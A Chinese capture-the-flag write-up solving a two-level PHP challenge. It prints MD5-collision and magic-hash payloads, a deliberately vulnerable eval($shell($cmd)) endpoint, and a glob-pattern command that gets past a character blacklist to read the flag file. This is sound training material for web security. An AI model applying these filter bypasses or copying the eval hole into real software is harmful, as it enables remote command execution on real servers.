[NSSCTF Round#16 Basic]RCE但是没有完全RCE

RCE但是没有完全RCE wp

题目代码：

第一关

 <?php
error_reporting(0);
highlight_file(__file__);
include('level2.php');
if (isset($_GET['md5_1']) && isset($_GET['md5_2'])) {
    if ((string)$_GET['md5_1'] !== (string)$_GET['md5_2'] && md5($_GET['md5_1']) === md5($_GET['md5_2'])) {
        if (isset($_POST['md5_3'])&&md5($_POST['md5_3']) == md5($_POST['md5_3'])) {
            echo $level2;
        } else {
            echo "您！！！！！那么现在阁下又该如何应对呢";
        }
    } else {
        echo "还在用传统方法？？？？";
    }
} else {
    echo "来做做熟悉的MD5~";
}
来做做熟悉的MD5~

第一个 md5 强比较，使用 payload ：

md5_1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&md5_2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

第二个 MD5 加密后弱比较等于自身，使用 payload：

# POST 传参
md5_3=0e215962017

返回结果：

提示：3z_RC3.php

第二关

访问 3z_RC3.php ：

 <?php
error_reporting(0);
highlight_file(__FILE__);
$shell = $_POST['shell'];
$cmd = $_GET['cmd'];
if(preg_match('/f|l|a|g|\*|\?/i',$cmd)){
    die("Hacker!!!!!!!!");
}
eval($shell($cmd)); 

温馨提示：linux 中可以使用 dir 命令代替 ls 来查看当前目录下的所有文件。

因此 POST 传参 shell=system ，同时 GET 传参 cmd=dir / ，即可查看根目录下所有文件。返回结果：

因为字母 a，l 被过滤了，所以 cat ，tac，head，tail，less 命令都用不了，但是 more 命令可以用。

flag 每个字母都被过滤了，* 和 ? 也用不了，可以用 [] 来匹配单个字符，如 [a-z] 匹配的是 a-z 之间的某个字符。

中括号正则匹配是根据ASCII码值来分辨先后顺序的。

因此 GET 传参

cmd=more /[b-z][b-z][^-b][b-z]

返回结果：